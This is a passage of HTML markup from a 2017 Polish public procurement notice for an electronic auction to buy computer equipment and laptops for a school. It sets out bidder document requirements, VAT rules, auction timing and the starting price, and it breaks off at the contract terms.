NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Nie dotyczy</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Nie dotyczy</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji">Nie dotyczy</span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Nie dotyczy</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz wniosku o dopuszczenie do udziału w licytacji o treści zgodnej ze wzoremstanowiącym zał. Nr 3 do Ogłoszenia. 2. Inne dokumenty wymagane w postępowaniu: a)Jeżeli wniosek, w tym wszelkie oświadczenia i dokumenty zostały podpisane przezosobę/by działające na podstawie pełnomocnictwa, do wniosku należy dołączyć właściwepełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałemprzez notariusza. W przypadku nie dopełnienia powyższego, po wyczerpaniu drogiwynikającej z art.26 ust.3a ustawy Prawo zamówień publicznych, powyższe będzieskutkowało nie dopuszczeniem Wykonawcy do udziału w licytacji elektronicznej. Poprzezanalogię, jeżeli osobą uprawnioną do składania ofert w imieniu Wykonawcy w trakcietrwania licytacji elektronicznej będzie osoba działająca na podstawie pełnomocnictwa, alboinna osoba niż podpisująca wniosek (np. tylko jeden członek zarządu w przypadkuwieloosobowej reprezentacji), należy dołączyć do wniosku albo najpóźniej na dzień przeddniem, w którym ma zostać przeprowadzona licytacja należy złożyć - pełnomocnictwopodpisane przez osobę/osoby uprawnioną/e do reprezentacji Wykonawcy, w formieoryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza, z któregowynikać będzie prawo do składania ofert w trakcie licytacji elektronicznej. W przypadkunie dopełnienia powyższego, tj. w sytuacji gdy najpóźniej na dzień przed dniem, w którymma zostać przeprowadzona licytacja, nie zostanie złożone pełnomocnictwo, o którym mowapowyżej, Wykonawca nie zostanie dopuszczony do udziału w licytacji elektronicznej. b)Pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania wpostępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku gdywykonawcy wspólnie ubiegają się o udzielenie zamówienia (oryginał lub notarialniepoświadczona kopia). W przypadku nie dopełnienia powyższego, po wyczerpaniu drogiwynikającej z art.26 ust.3a ustawy Prawo zamówień publicznych, powyższe będzieskutkowało nie dopuszczeniem Wykonawców do udziału w licytacji elektronicznej. c)Downiosku o dopuszczenie do udziału w licytacji należy załączyć dokument/ypotwierdzający/e, że osoba podpisująca wniosek i inne dokumenty lub oświadczenia lubudzielająca pełnomocnictwa - jest umocowana do reprezentowania Wykonawcy (w odniesieniu do pełnomocnictwa - była upoważniona do reprezentowania Wykonawcy wdacie udzielenia pełnomocnictwa), chyba że umocowanie wynika z dokumentu/ówdostępnego/ych dla Zamawiającego w myśl art.26 ust.6 ustawy Pzp. d) W przypadku gdyWykonawca przy wykazywaniu warunków udziału w postępowaniu polega na zdolnościachlub sytuacji innych podmiotów na zasadach określonych w art. 22a ust.1 ustawy PZP,zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymido realizacji zamówienia, w szczególności przedstawiając w tym celu zobowiązanie tychpodmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacjizamówienia. Udowodnienie, o którym mowa powyżej powinno obejmować nie tylkowskazanie faktu udostępnienia określonych wykonawcy zasobów przez podmiot trzeci, alewinno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia, wskazywać jego rodzaj,czas udzielenia a także inne istotne okoliczności, w tym wynikające ze specyfiki tegozasobu. W przypadku nie udowodnienia we wniosku, w wystarczający sposóbdysponowania zasobami podmiotu trzeciego, niezbędnymi dla należytego wykonaniazamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantujerzeczywisty dostęp do tych zasobów, w trakcie badania dokumentów złożonych w tokupostępowania o udzielenie zamówienia publicznego, zamawiający wezwie wykonawcę doprzedstawienia zamawiającemu dokumentów, dotyczących w szczególności: 1) zakresudostępnych wykonawcy zasobów innego podmiotu, 2) sposobu wykorzystania zasobówinnego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 3) zakresu i okresuudziału innego podmiotu w wykonywaniu zamówienia. Uwaga! Informację o podmiotachna zdolnościach lub sytuacji, których Wykonawca polega, na zasadach określonych wart.22a ust.1 ustawy PZP należy zawrzeć w oświadczeniach, o których mowa w sekcji III -pkt 3) Ogłoszenia. Przykładowy wzór zobowiązania w zakresie określonego warunkuudziału w postępowaniu, tj. zdolności technicznej - stanowi załącznik nr 6 do Ogłoszenia. 3.Zasady wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, o którychmowa w art. 23 ustawy Pzp: 1) Wykonawcy, którzy wspólnie ubiegają się o udzieleniezamówienia mogą łącznie spełniać warunki o których mowa w art. 22 ust. 1 pkt 2ustawyPzp. 2) Wykonawcy występujący wspólnie (np. spółki cywilne, konsorcja) są zobowiązanido ustanowienia Pełnomocnika do reprezentowania ich (tj. konsorcjum) w postępowaniualbo do reprezentowania ich (tj. konsorcjum) w postępowaniu i zawarcia umowy w sprawieprzedmiotowego zamówienia publicznego. Oryginał pełnomocnictwa lub kopii poświadczonej notarialnie musi być załączony do wniosku i zawierać w szczególnościwskazania: - postępowania o zamówienie publiczne, którego dotyczy; - wszystkichWykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwyz określeniem adresu siedziby; - ustanowionego Pełnomocnika oraz zakresu jegoumocowania. 3) W przypadku złożenia wspólnego wniosku, w formularzu wnioskupełnomocnik zaznacza w czyim imieniu występuje. 4) Wszelka korespondencja orazrozliczenia dokonywane będą wyłącznie z pełnomocnikiem. 5) Żaden z Wykonawcówskładających wspólnie wniosek, nie może podlegać wykluczeniu z powodu niespełnieniawarunków, o których mowa w art. 24 ust.1 ustawy Pzp. (oświadczenie o niepodleganiuwykluczeniu, o którym mowa w sekcji III - pkt 3) Ogłoszenia składają wszyscyWykonawcy składający wspólny wniosek). 6)Oświadczenie o spełnianiu warunków udziałuw postępowaniu, o którym mowa w sekcji III - pkt 3) Ogłoszenia - Wykonawcy wspólnieubiegający się o udzielnie zamówienia składają wspólnie (tj. oświadczenie ma zostaćpodpisane przez wszystkich Wykonawców, bądź umocowanego PełnomocnikaWykonawców), potwierdzając iż określone warunki spełniają razem. 4. Mając na uwadzebrzmienie art.24 ust.1 pkt 23) ustawy PZP, odnosząc się równocześnie do brzmienia art.26ust.2f ustawy PZP - Zamawiający informuje, iż wraz z zaproszeniem do składania ofert,skierowanym do Wykonawców spełniających warunki udziału w postępowaniu, wezwie ichwszystkich, do: złożenia oświadczenia o przynależności lub braku przynależności do tejsamej grupy kapitałowej, o której mowa w art.24 ust.1 pkt 23) ustawy PZP (stanowiącegozałącznik nr 7 do Ogłoszenia). Oświadczenie to nie jest wymagane na etapie składaniawniosków o dopuszczenie do udziału w licytacji elektronicznej. 5.Wykonawca zagranicznyskłada dokumenty zgodne z zapisami sekcji III pkt 3) oraz 7) Ogłoszenia, ze szczególnymuwzględnieniem, aby dokumenty złożone z wnioskiem potwierdzały, iż wniosek zostałpodpisany przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">http://aukcje.um.warszawa.pl</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">http://www.kusy.edu.pl</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1. Wykonawca, pobiera ze wskazanej w ogłoszeniu o przedmiotowej licytacji stronyinternetowej http://www.kusy.edu.pl wzór wniosku wraz z załącznikami. Następnie, wprzypadku zainteresowania udziałem w licytacji elektronicznej, składa wniosek odopuszczenie do udziału w postępowaniu. Złożenie wniosku jednocześnie oznaczaakceptację warunków licytacji i postanowień umowy. Zamawiający, po weryfikacjinadesłanych wniosków, informuje Wykonawców o wyniku kwalifikacji oraz zaprasza doskładania ofert (postąpień) wszystkich Wykonawców spełniających warunki udziału wpostępowaniu. Treść zaproszenia zawierać będzie adres strony internetowej, na którejodbywać się będzie licytacja oraz parametry licytacji elektronicznej (data, godzina otwarcia,czas trwania i warunki zamknięcia licytacji). Następnie za pośrednictwem operatoraplatformy aukcyjnej do zakwalifikowanych do udziału w licytacji Wykonawców (na adrese-mail osoby wskazanej we wniosku o dopuszczenie do udziału w postępowaniu) zostaniewysłana wiadomość wraz z instrukcją obsługi platformy aukcyjnej. Kody dostępu doplatformy aukcyjnej: 1) Operator platformy aukcyjnej przekazuje zakwalifikowanym przezZamawiającego Wykonawcom informację o sposobie rejestracji na platformie aukcyjnej. Wtrakcie rejestracji Wykonawca otrzyma kod dostępu do platformy aukcyjnej. Otrzymanykod dostępu do platformy aukcyjnej Wykonawca będzie musiał zmienić na nowy -określony przez siebie. 2) O ewentualnych problemach z rejestracją należy niezwłoczniepowiadomić osobę upoważnioną do kontaktu z Wykonawcami, której dane kontaktoweprzekazane zostaną w zaproszeniu do składania ofert w licytacji elektrycznej. W dalszejkolejności, w terminie wyznaczonym w treści wiadomości, dla Wykonawców zaproszonychdo udziału w licytacji elektronicznej zostanie zdefiniowana licytacja testowa. W trakcielicytacji testowej, dla zainteresowanych Wykonawców, operator platformy przeprowadzitelefonicznie szkolenie dotyczące zasad korzystania z platformy aukcyjnej, w czasie któregozostaną omówione zasady postępowania w trakcie licytacji elektronicznej. 2. Komputerużytkownika powinien spełniać następujące wymagania: posiadać zainstalowany systemoperacyjny wspierany przez producenta tego systemu (Windows 7/Windows 8/Windows 10 bądź nowszy); być wyposażony w procesor taktowany zegarem o częstotliwości 1 GHz iposiadać co najmniej 1 GB pamięci RAM (są to wymagania jakie powinien spełnićkomputer z systemem Windows 7); posiadać zainstalowaną przeglądarkę internetowąwspieraną przez jej producenta: Microsoft Internet Explorer w wersji co najmniej IE10 alboMozilla Firefox; posiadać połączenie z siecią Internet o przepustowości nie mniejszej niż128 kb/s. 3. Od momentu otwarcia do momentu zamknięcia licytacji, zgodnie z art.77ustawy Pzp, Zamawiający i Wykonawcy przekazują wnioski, oświadczenie i inneinformacje drogą elektroniczną, za pomocą platformy, na której prowadzona jest licytacja.</span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9">1. W trakcie licytacji Wykonawca podaje ryczałtową cenę brutto (z VAT) za zakresokreślony w Opisie przedmiotu zamówienia stanowiącym załącznik nr 1 do Ogłoszenia orazwzorze umowy zawartym w sekcji IV - pkt 4) Ogłoszenia (stanowiącym równocześniezałącznik nr 2 do Ogłoszenia). Zamawiający, informuje iż, sprzęt komputerowy/elektroniczny opisany w opisie przedmiotu zamówienia (stanowiącym załącznik nr 1 do Ogłoszenia) w pozycji 1, 2 i 4 będzie dostarczony do placówki oświatowej na potrzeby dydaktyczne. Tym samym, na podstawie ,,Ustawy o podatku od towarów i usług" z dnia 11 marca 2004 roku (art.83 ust.1 pkt 26) stosuje się do nich stawkę podatku w wysokości 0%.Równocześnie wskazuje się, iż w poz.4 Opisu przedmiotu zamówienia stanowiącym załącznik nr 1 do Ogłoszenia wyszczególnione zostały laptopy. W przypadku tej pozycji wartość podatku VAT podlega mechanizmowi odwróconego obciążenia, a zatem powstania obowiązku podatkowego po stronie Zamawiającego. Natomiast mając na uwadze powyższe, tj. fakt, iż laptopy mają zostać dostarczone do placówki oświatowej na potrzeby dydaktyczne, nawet w przypadku gdy Wykonawca poinformuje Zamawiającego (we wniosku o dopuszczenie do udziału w licytacji elektronicznej), że wybór oferty w tym zakresie będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, to podatek ten wynosi 0%. Tym samym, w niniejszym przypadku nie istnieje zagrożenie nieporównywalności ofert składanych w trakcie trwania licytacji elektronicznej. Równocześnie, czyniąc zadość przepisom art.91 ust.3a ustawy Pzp, Zamawiający w niniejszym przypadku wymaga aby Wykonawca, składając wniosek o dopuszczenie do udziału w licytacji elektronicznej, poinformował Zamawiającego, czy wybór oferty (uwzględniającej m.in. laptopy), będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wskazując nazwę towaru, którego dostawa będzie prowadzić do jego powstania. W przypadku, gdy Wykonawca nie określi niniejszego we wniosku, Zamawiający przyjmie, iż wybór oferty nie będzie prowadzić u Zamawiającego obowiązku podatkowego. 2. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim Wykonawcom informacje o pozycji składanych przez nich ofert, liczbie Wykonawców biorących udział w licytacji, a także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 3. Zamawiający przewiduje otwarcie licytacji elektronicznej w dniu 07.06.2017 r. o godz.12:00. Ostateczny termin licytacji Zamawiający poda w zaproszeniu do udziału w licytacji elektronicznej. Zamawiający ustala czas trwania licytacji na 15 minut. Zamawiający zamyka licytację, gdy w podstawowym czasie nie zostanie złożona żadna oferta lub gdy w ciągu 3 minut od złożenia oferty przez jednego z Wykonawców nie zostanie złożona żadna inna oferta, jednakże nie wcześniej niż po upływie 15 minut od otwarcia licytacji. Zamawiający zastrzega sobie prawo do zmian powyższych parametrów licytacji. O zmianach zostaną niezwłocznie poinformowanie wszyscy zaproszeni Wykonawcy. 4. Za ofertę najkorzystniejszą zostanie uznana oferta, która zawierać będzie w chwili zamknięcia licytacji elektronicznej, najniższą ryczałtową cenę brutto za realizację całego zamówienia. 5. Zapłata nastąpi zgodnie z warunkami umowy - wzór umowy zamieszczony został w pkt IV.4) Ogłoszenia (stanowiącejrównocześnie załącznik nr 2 do Ogłoszenia). 6. Zamawiający dopuszcza prowadzenierozliczeń z Wykonawcą jedynie w walucie polskiej. Dodatkowo nadmienia się, iż składanieofert (postąpień) w licytacji elektronicznej musi być także wyrażone w walucie polskiej.Ryzykiem konieczności wykonania wszelkich prac towarzyszących, mogących pojawić sięw trakcie realizacji zamówienia, ryzykiem związanym ze zmianą stawki podatku VAT,zmianami kursów walut, ceł itp., obciąża się Wykonawcę a Wykonawca winien jeuwzględnić w składanej w trakcie licytacji ofercie (postąpieniu). 7. Minimalna wysokośćpostąpień - 1 000,00. 8.Cena wywoławcza: 114 550,00 PLN. 9. Po zamknięciu licytacjielektronicznej, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązekprzekazać Zamawiającemu w formie formularza - ceny jednostkowe sprzętu (uwzględniające zapisy ust.1), który stanowićbędzie załącznik nr 3 do wzoru umowy. Formularz ten jest kalkulacją Wykonawcysporządzoną przez niego w oparciu o opis przedmiotu zamówienia stanowiący załącznik nr1 do Ogłoszenia oraz wzór umowy zamieszczony w sekcji IV - pkt 4) Ogłoszenia(stanowiący załącznik nr 2 do Ogłoszenia), z tym że łączna cena zamówienia brutto musibyć co najwyżej równa z ceną realizacji oferty, która wygrała licytację elektroniczną.Wszystkie ceny muszą być ustalone z dokładnością do dwóch miejsc po przecinku.</span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas">15 minut</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2017-05-26 </span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 10:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">07.06.2017 r.</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Zamawiający przewiduje otwarcie licytacji elektronicznej w dniu 07.06.2017 r. godzina12:00. Zamawiający przewiduje zamknięcie licytacji elektronicznej w dniu 07.06.2017 r. ogodzinie 12:15, dodatkowe informacje zawarte zostały w punkcie odnoszącym się dosposobu postępowania w licytacji elektronicznej.</span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">§ 1Przedmiot umowy.1.	Przedmiotem umowy (zwane dalej ,,Przedmiotem Umowy") jest dostawa przez 